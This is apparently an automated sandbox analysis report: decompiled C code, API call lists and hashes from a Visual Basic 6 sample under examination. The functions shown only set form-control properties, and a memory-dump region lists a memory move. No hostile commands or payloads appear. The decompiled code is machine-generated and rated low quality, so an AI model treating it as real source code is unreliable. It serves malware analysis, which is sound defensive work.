                                                        			E00414CC0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				char _v28;
                                                        				intOrPtr _v32;
                                                        				intOrPtr _v40;
                                                        				intOrPtr* _t22;
                                                        				void* _t24;
                                                        				void* _t27;
                                                        				void* _t28;
                                                        				intOrPtr* _t40;
                                                        				intOrPtr* _t41;
                                                        				intOrPtr* _t43;
                                                        				void* _t44;
                                                        				void* _t46;
                                                        				intOrPtr _t47;
                                                        				intOrPtr _t48;
                                                        
                                                        				_t47 = _t46 - 0xc;
                                                        				 *[fs:0x0] = _t47;
                                                        				_t48 = _t47 - 0x24;
                                                        				_v16 = _t48;
                                                        				_v12 = 0x401260;
                                                        				_v8 = 0;
                                                        				_t43 = _a4;
                                                        				 *((intOrPtr*)( *_t43 + 4))(_t43, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t44);
                                                        				_v28 = 0;
                                                        				_t22 =  *((intOrPtr*)( *_t43 + 0x3b0))(_t43);
                                                        				__imp____vbaObjSet( &_v28, _t22);
                                                        				_t40 = _t22;
                                                        				_t24 =  *((intOrPtr*)( *_t40 + 0x54))(_t40, _a8);
                                                        				asm("fclex");
                                                        				if(_t24 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t24, _t40, 0x410414, 0x54);
                                                        				}
                                                        				__imp____vbaFreeObj();
                                                        				_t41 = _t48 - 0x10;
                                                        				 *_t41 = 8;
                                                        				 *((intOrPtr*)(_t41 + 4)) = _v40;
                                                        				 *(_t41 + 8) = L"BackColor";
                                                        				 *((intOrPtr*)(_t41 + 0xc)) = _v32;
                                                        				_t27 =  *((intOrPtr*)( *_t43 + 0x390))(_t43);
                                                        				asm("fclex");
                                                        				if(_t27 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t27, _t43, 0x40f430, 0x390);
                                                        				}
                                                        				_t28 =  *((intOrPtr*)( *_t43 + 0x8b4))(_t43);
                                                        				_push(0x414d94);
                                                        				return _t28;
                                                        			}




















                                                        0x00414cc3
                                                        0x00414cd2
                                                        0x00414cd9
                                                        0x00414cdf
                                                        0x00414ce2
                                                        0x00414ceb
                                                        0x00414cee
                                                        0x00414cf4
                                                        0x00414cfa
                                                        0x00414cfd
                                                        0x00414d08
                                                        0x00414d11
                                                        0x00414d17
                                                        0x00414d1c
                                                        0x00414d1e
                                                        0x00414d29
                                                        0x00414d29
                                                        0x00414d32
                                                        0x00414d40
                                                        0x00414d4a
                                                        0x00414d4f
                                                        0x00414d52
                                                        0x00414d58
                                                        0x00414d5b
                                                        0x00414d63
                                                        0x00414d65
                                                        0x00414d73
                                                        0x00414d73
                                                        0x00414d7c
                                                        0x00414d82
                                                        0x00000000

                                                        APIs
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00414D08
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000054,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00414D29
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00414D32
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,0040F430,00000390), ref: 00414D73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckHresult$Free
                                                        • String ID: BackColor
                                                        • API String ID: 3976024557-3019154971
                                                        • Opcode ID: 2ab2aa2643bbad4e55afb473e8ea9daa847f1db1624756398e75763e3f0a8fc3
                                                        • Instruction ID: 9c24af2665aa12c466e817f53982f4e97f53592b14043ebffd5b4acdc69109bf
                                                        • Opcode Fuzzy Hash: 2ab2aa2643bbad4e55afb473e8ea9daa847f1db1624756398e75763e3f0a8fc3
                                                        • Instruction Fuzzy Hash: B4217F74900205AFD7049FA8C989EDABBF8FF48704F20847EF545E7690CB78A885CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 31%
                                                        			E00414E80(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				char _v28;
                                                        				intOrPtr _v32;
                                                        				intOrPtr _v40;
                                                        				intOrPtr* _t22;
                                                        				void* _t24;
                                                        				void* _t27;
                                                        				void* _t28;
                                                        				intOrPtr* _t40;
                                                        				intOrPtr* _t41;
                                                        				intOrPtr* _t43;
                                                        				void* _t44;
                                                        				void* _t46;
                                                        				intOrPtr _t47;
                                                        				intOrPtr _t48;
                                                        
                                                        				_t47 = _t46 - 0xc;
                                                        				 *[fs:0x0] = _t47;
                                                        				_t48 = _t47 - 0x24;
                                                        				_v16 = _t48;
                                                        				_v12 = 0x401280;
                                                        				_v8 = 0;
                                                        				_t43 = _a4;
                                                        				 *((intOrPtr*)( *_t43 + 4))(_t43, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t44);
                                                        				_v28 = 0;
                                                        				_t22 =  *((intOrPtr*)( *_t43 + 0x3b0))(_t43);
                                                        				__imp____vbaObjSet( &_v28, _t22);
                                                        				_t40 = _t22;
                                                        				_t24 =  *((intOrPtr*)( *_t40 + 0x6c))(_t40, _a8);
                                                        				asm("fclex");
                                                        				if(_t24 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t24, _t40, 0x410414, 0x6c);
                                                        				}
                                                        				__imp____vbaFreeObj();
                                                        				_t41 = _t48 - 0x10;
                                                        				 *_t41 = 8;
                                                        				 *((intOrPtr*)(_t41 + 4)) = _v40;
                                                        				 *(_t41 + 8) = L"ForeColor";
                                                        				 *((intOrPtr*)(_t41 + 0xc)) = _v32;
                                                        				_t27 =  *((intOrPtr*)( *_t43 + 0x390))(_t43);
                                                        				asm("fclex");
                                                        				if(_t27 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t27, _t43, 0x40f430, 0x390);
                                                        				}
                                                        				_t28 =  *((intOrPtr*)( *_t43 + 0x8b4))(_t43);
                                                        				_push(0x414f54);
                                                        				return _t28;
                                                        			}




















                                                        0x00414e83
                                                        0x00414e92
                                                        0x00414e99
                                                        0x00414e9f
                                                        0x00414ea2
                                                        0x00414eab
                                                        0x00414eae
                                                        0x00414eb4
                                                        0x00414eba
                                                        0x00414ebd
                                                        0x00414ec8
                                                        0x00414ed1
                                                        0x00414ed7
                                                        0x00414edc
                                                        0x00414ede
                                                        0x00414ee9
                                                        0x00414ee9
                                                        0x00414ef2
                                                        0x00414f00
                                                        0x00414f0a
                                                        0x00414f0f
                                                        0x00414f12
                                                        0x00414f18
                                                        0x00414f1b
                                                        0x00414f23
                                                        0x00414f25
                                                        0x00414f33
                                                        0x00414f33
                                                        0x00414f3c
                                                        0x00414f42
                                                        0x00000000

                                                        APIs
                                                        • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00414EC8
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000006C,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00414EE9
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00414EF2
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401280,0040F430,00000390), ref: 00414F33
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckHresult$Free
                                                        • String ID: ForeColor
                                                        • API String ID: 3976024557-3216175
                                                        • Opcode ID: eefcccb9295053de52599cb7315220aa0d7fc486a939f50cc934217536083238
                                                        • Instruction ID: 200adc891a931f130d032e10b44e63acef645ae65958817123503f6469996b9c
                                                        • Opcode Fuzzy Hash: eefcccb9295053de52599cb7315220aa0d7fc486a939f50cc934217536083238
                                                        • Instruction Fuzzy Hash: F6214F74900205AFC7009F69C989EAABBF8FF49704F20853EF545E7691C778A985CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 24%
                                                        			E00418030(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, short _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				char _v40;
                                                        				intOrPtr _v44;
                                                        				intOrPtr _v52;
                                                        				intOrPtr _t22;
                                                        				void* _t25;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr* _t38;
                                                        				void* _t39;
                                                        				void* _t41;
                                                        				intOrPtr _t42;
                                                        				intOrPtr _t43;
                                                        
                                                        				_t42 = _t41 - 0xc;
                                                        				 *[fs:0x0] = _t42;
                                                        				_t43 = _t42 - 0x2c;
                                                        				_v16 = _t43;
                                                        				_v12 = 0x4014e0;
                                                        				_v8 = 0;
                                                        				_t38 = _a4;
                                                        				 *((intOrPtr*)( *_t38 + 4))(_t38, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t39);
                                                        				_t6 = _t38 + 0x70; // 0x0
                                                        				_t22 =  *_t6;
                                                        				_v40 = 0;
                                                        				 *((short*)(_t38 + 0x4c)) = _a8;
                                                        				if(_t22 != 0) {
                                                        					__imp____vbaI4Var( &_v40, 0);
                                                        					_t11 = _t38 + 0x70; // 0x0
                                                        					E0040F5DC();
                                                        					__imp____vbaSetSystemError( *_t11, 0xc5, _t22);
                                                        				}
                                                        				_t28 = _t43 - 0x10;
                                                        				 *_t28 = 8;
                                                        				 *((intOrPtr*)(_t28 + 4)) = _v52;
                                                        				 *(_t28 + 8) = L"MaxLen";
                                                        				 *((intOrPtr*)(_t28 + 0xc)) = _v44;
                                                        				_t25 =  *((intOrPtr*)( *_t38 + 0x390))(_t38);
                                                        				asm("fclex");
                                                        				if(_t25 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t25, _t38, 0x40f430, 0x390);
                                                        				}
                                                        				__imp____vbaFreeVar(0x4180e9);
                                                        				return _t25;
                                                        			}

















                                                        0x00418033
                                                        0x00418042
                                                        0x00418049
                                                        0x0041804f
                                                        0x00418052
                                                        0x0041805b
                                                        0x0041805e
                                                        0x00418064
                                                        0x00418067
                                                        0x00418067
                                                        0x00418070
                                                        0x00418073
                                                        0x00418077
                                                        0x0041807e
                                                        0x00418085
                                                        0x0041808e
                                                        0x00418093
                                                        0x00418093
                                                        0x004180a1
                                                        0x004180ab
                                                        0x004180b0
                                                        0x004180b3
                                                        0x004180b9
                                                        0x004180bc
                                                        0x004180c4
                                                        0x004180c6
                                                        0x004180d4
                                                        0x004180d4
                                                        0x004180e2
                                                        0x004180e8

                                                        APIs
                                                        • __vbaI4Var.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041807E
                                                        • __vbaSetSystemError.MSVBVM60(00000000,000000C5,00000000), ref: 00418093
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004014E0,0040F430,00000390), ref: 004180D4
                                                        • __vbaFreeVar.MSVBVM60(004180E9,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004180E2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckErrorFreeHresultSystem
                                                        • String ID: MaxLen
                                                        • API String ID: 2324377981-3286092166
                                                        • Opcode ID: 3efd6e372770f0cc05d0e2e4e43b620ab7edef7ce5c7e643b02334a5fa94dfe8
                                                        • Instruction ID: 43fb9eac10100783ebb17336cda9c751793323e4abdf3db86d3de273639be0b1
                                                        • Opcode Fuzzy Hash: 3efd6e372770f0cc05d0e2e4e43b620ab7edef7ce5c7e643b02334a5fa94dfe8
                                                        • Instruction Fuzzy Hash: 55116D74900204EFCB10EFA9CA89A9ABBF8FF58700F14856AF545E7660C774A944CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256690931.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3e0000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction ID: a9c55f1ebf84d8446c404b699cc1538e131eecd2c81e9e5e120baa798ee65dcb
                                                        • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction Fuzzy Hash: B44149716143A55BC329DF6BCC85BAFB3D8ABC4740F084A3EF540DA2C1D2B0D94887A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(0040B730,?,00000000,004016F0,00401724), ref: 0041DA46
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DA67
                                                        • __vbaVarTextTstEq.MSVBVM60(?,?), ref: 0041DA78
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041DA83
                                                        • __vbaVarMove.MSVBVM60 ref: 0041DAA5
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresultMoveNew2Text
                                                        • String ID:
                                                        • API String ID: 3236348378-0
                                                        • Opcode ID: 8c6afbb01b9905e70d77daef7e8ee2e29f94c3ba3ddb5ceb0b079cc7ff36a70d
                                                        • Instruction ID: fdc46e1b3e124afdd385c64085a586ee7b82449415dd7df5bddc25780375a6e7
                                                        • Opcode Fuzzy Hash: 8c6afbb01b9905e70d77daef7e8ee2e29f94c3ba3ddb5ceb0b079cc7ff36a70d
                                                        • Instruction Fuzzy Hash: A1116AB4C01248ABCB10DFA5CA48ADEBBF8EF58750F20451AE046B72A4D3785A49CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,00401D26), ref: 00421656
                                                        • __vbaStrCmp.MSVBVM60(?,00000000,?,?,?,?,?,00401D26), ref: 00421663
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,00401D26), ref: 00421672
                                                        • __vbaRaiseEvent.MSVBVM60(00401A10,00000001,00000000,?,?,?,?,?,00401D26), ref: 00421679
                                                        • __vbaFreeStr.MSVBVM60(00421691,?,?,?,?,?,00401D26), ref: 0042168A
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Copy$EventFreeRaise
                                                        • String ID:
                                                        • API String ID: 154623747-0
                                                        • Opcode ID: fa92cc8b5623ba4c8629e18c7f4c6513b7b9acaae828e53bd6cd7ba46c6761ba
                                                        • Instruction ID: b2d60d446fcf4414bed0bbee23a1a3e3726a2811a8e07469eda3bd4126f49575
                                                        • Opcode Fuzzy Hash: fa92cc8b5623ba4c8629e18c7f4c6513b7b9acaae828e53bd6cd7ba46c6761ba
                                                        • Instruction Fuzzy Hash: 89015274A00209AFDB10DF55DA86AAFBBB8FF44700F10801AF945B3660D774A945CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,00401D26), ref: 00421816
                                                        • __vbaStrCmp.MSVBVM60(?,00421968,?,?,?,?,?,00401D26), ref: 00421823
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,00401D26), ref: 00421832
                                                        • __vbaRaiseEvent.MSVBVM60(00401A40,00000001,00000000,?,?,?,?,?,00401D26), ref: 00421839
                                                        • __vbaFreeStr.MSVBVM60(00421851,?,?,?,?,?,00401D26), ref: 0042184A
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Copy$EventFreeRaise
                                                        • String ID:
                                                        • API String ID: 154623747-0
                                                        • Opcode ID: caca446f4272e883799ed2886b058530965cada52f6969c94c22aa01c1ef8de3
                                                        • Instruction ID: 66dacd79cef0309c3f62b2f2e94dc7dbe992664eea759b47d75e66a3ecdcf870
                                                        • Opcode Fuzzy Hash: caca446f4272e883799ed2886b058530965cada52f6969c94c22aa01c1ef8de3
                                                        • Instruction Fuzzy Hash: BF015274A00209AFDB10EF55DA86AAFBFB9FF44700F108019F605A3660D774A945CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 22%
                                                        			E00417B70(intOrPtr* _a4, intOrPtr _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v36;
                                                        				char _v44;
                                                        				intOrPtr _t30;
                                                        				short _t31;
                                                        				void* _t34;
                                                        				intOrPtr* _t35;
                                                        				void* _t38;
                                                        				char _t39;
                                                        				void* _t51;
                                                        				intOrPtr* _t53;
                                                        				void* _t55;
                                                        				intOrPtr* _t56;
                                                        				intOrPtr _t58;
                                                        				intOrPtr _t59;
                                                        
                                                        				 *[fs:0x0] = _t58;
                                                        				_t59 = _t58 - 0x28;
                                                        				_v16 = _t59;
                                                        				_v12 = 0x4014a0;
                                                        				_t39 = 0;
                                                        				_v8 = 0;
                                                        				_t56 = _a4;
                                                        				 *((intOrPtr*)( *_t56 + 4))(_t56, _t51, _t55, _t38,  *[fs:0x0], 0x401d26);
                                                        				_v44 = 0;
                                                        				_t30 = _a8;
                                                        				if(_t30 == 0) {
                                                        					_t11 = _t56 + 0x70; // 0x0
                                                        					_t31 =  &_v44;
                                                        					_push(_t31);
                                                        					_push(0);
                                                        					_push(0xcf);
                                                        					_v44 = 0;
                                                        					_push( *_t11);
                                                        					goto L4;
                                                        				} else {
                                                        					_t31 = _t30 - 1;
                                                        					if(_t31 == 0) {
                                                        						_t8 = _t56 + 0x70; // 0x0
                                                        						_push( &_v44);
                                                        						_push(0xffffffff);
                                                        						_push(0xcf);
                                                        						_v44 = 0;
                                                        						_push( *_t8);
                                                        						L4:
                                                        						E0040F5DC();
                                                        						__imp____vbaSetSystemError();
                                                        						 *((intOrPtr*)(_t56 + 0x80)) = _t31;
                                                        						_t39 = 0;
                                                        					}
                                                        				}
                                                        				__imp____vbaI2I4();
                                                        				_t53 = _t59 - 0x10;
                                                        				 *((short*)(_t56 + 0x46)) = _t31;
                                                        				 *_t53 = 8;
                                                        				 *((intOrPtr*)(_t53 + 4)) = _v36;
                                                        				 *(_t53 + 8) = L"ControlType";
                                                        				 *((intOrPtr*)(_t53 + 0xc)) = _v28;
                                                        				_t34 =  *((intOrPtr*)( *_t56 + 0x390))(_t56);
                                                        				asm("fclex");
                                                        				if(_t34 < _t39) {
                                                        					__imp____vbaHresultCheckObj(_t34, _t56, 0x40f430, 0x390);
                                                        				}
                                                        				_t35 = _a4;
                                                        				 *((intOrPtr*)( *_t35 + 8))(_t35);
                                                        				 *[fs:0x0] = _v24;
                                                        				return _v8;
                                                        			}






















                                                        0x00417b82
                                                        0x00417b89
                                                        0x00417b8f
                                                        0x00417b92
                                                        0x00417b99
                                                        0x00417b9b
                                                        0x00417b9e
                                                        0x00417ba4
                                                        0x00417baa
                                                        0x00417baf
                                                        0x00417bb1
                                                        0x00417bca
                                                        0x00417bcd
                                                        0x00417bd0
                                                        0x00417bd1
                                                        0x00417bd2
                                                        0x00417bd7
                                                        0x00417bda
                                                        0x00000000
                                                        0x00417bb3
                                                        0x00417bb3
                                                        0x00417bb4
                                                        0x00417bb6
                                                        0x00417bbc
                                                        0x00417bbd
                                                        0x00417bbf
                                                        0x00417bc4
                                                        0x00417bc7
                                                        0x00417bdb
                                                        0x00417bdb
                                                        0x00417be2
                                                        0x00417be8
                                                        0x00417bee
                                                        0x00417bee
                                                        0x00417bb4
                                                        0x00417bf2
                                                        0x00417c00
                                                        0x00417c04
                                                        0x00417c0d
                                                        0x00417c13
                                                        0x00417c16
                                                        0x00417c1c
                                                        0x00417c1f
                                                        0x00417c27
                                                        0x00417c29
                                                        0x00417c37
                                                        0x00417c37
                                                        0x00417c3d
                                                        0x00417c43
                                                        0x00417c4e
                                                        0x00417c59

                                                        APIs
                                                        • __vbaSetSystemError.MSVBVM60(00000000,000000CF,00000000,?), ref: 00417BE2
                                                        • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00417BF2
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004014A0,0040F430,00000390), ref: 00417C37
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckErrorHresultSystem
                                                        • String ID: ControlType
                                                        • API String ID: 2264031751-1799722345
                                                        • Opcode ID: 3d5db9f3613f0ae59e05d343d6ba557caa3bb43035d8f9d6a913e73e48bd9124
                                                        • Instruction ID: e588fa7e3cd09ed406906bacfaf3bae688aa11bf68797b30e330ee10e2c33fd8
                                                        • Opcode Fuzzy Hash: 3d5db9f3613f0ae59e05d343d6ba557caa3bb43035d8f9d6a913e73e48bd9124
                                                        • Instruction Fuzzy Hash: 98318E71A00209AFC710DFA8C985AEABBB9FB08710F10853EF549E7790D734A845CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 48%
                                                        			E00416BD0(intOrPtr* _a4, void* _a8) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v36;
                                                        				short _t23;
                                                        				void* _t26;
                                                        				intOrPtr _t27;
                                                        				intOrPtr* _t29;
                                                        				void* _t32;
                                                        				intOrPtr* _t33;
                                                        				void* _t42;
                                                        				void* _t45;
                                                        				intOrPtr* _t46;
                                                        				intOrPtr _t48;
                                                        				intOrPtr _t49;
                                                        
                                                        				 *[fs:0x0] = _t48;
                                                        				_t49 = _t48 - 0x1c;
                                                        				_v16 = _t49;
                                                        				_v12 = 0x4013d0;
                                                        				_v8 = 0;
                                                        				_t46 = _a4;
                                                        				_t23 =  *((intOrPtr*)( *_t46 + 4))(_t46, _t42, _t45, _t32,  *[fs:0x0], 0x401d26);
                                                        				__imp____vbaI2I4();
                                                        				_t33 = _t49 - 0x10;
                                                        				 *((short*)(_t46 + 0x3c)) = _t23;
                                                        				 *_t33 = 8;
                                                        				 *((intOrPtr*)(_t33 + 4)) = _v36;
                                                        				 *(_t33 + 8) = L"Alignment";
                                                        				 *((intOrPtr*)(_t33 + 0xc)) = _v28;
                                                        				_t26 =  *((intOrPtr*)( *_t46 + 0x390))(_t46);
                                                        				asm("fclex");
                                                        				if(_t26 < 0) {
                                                        					__imp____vbaHresultCheckObj(_t26, _t46, 0x40f430, 0x390);
                                                        				}
                                                        				_t14 = _t46 + 0x70; // 0x0
                                                        				_t27 =  *_t14;
                                                        				if(_t27 != 0) {
                                                        					E0040FB74();
                                                        					__imp____vbaSetSystemError(_t27);
                                                        					 *((intOrPtr*)(_t46 + 0x70)) = 0;
                                                        				}
                                                        				 *((intOrPtr*)( *_t46 + 0x8a4))(_t46);
                                                        				_t29 = _a4;
                                                        				 *((intOrPtr*)( *_t29 + 8))(_t29);
                                                        				 *[fs:0x0] = _v24;
                                                        				return _v8;
                                                        			}




















                                                        0x00416be2
                                                        0x00416be9
                                                        0x00416bef
                                                        0x00416bf2
                                                        0x00416bfb
                                                        0x00416bfe
                                                        0x00416c04
                                                        0x00416c0a
                                                        0x00416c18
                                                        0x00416c1c
                                                        0x00416c25
                                                        0x00416c2b
                                                        0x00416c2e
                                                        0x00416c34
                                                        0x00416c37
                                                        0x00416c3f
                                                        0x00416c41
                                                        0x00416c4f
                                                        0x00416c4f
                                                        0x00416c55
                                                        0x00416c55
                                                        0x00416c5a
                                                        0x00416c5d
                                                        0x00416c62
                                                        0x00416c68
                                                        0x00416c68
                                                        0x00416c6e
                                                        0x00416c74
                                                        0x00416c7a
                                                        0x00416c85
                                                        0x00416c90

                                                        APIs
                                                        • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,00401D26), ref: 00416C0A
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004013D0,0040F430,00000390,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00416C4F
                                                        • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00416C62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
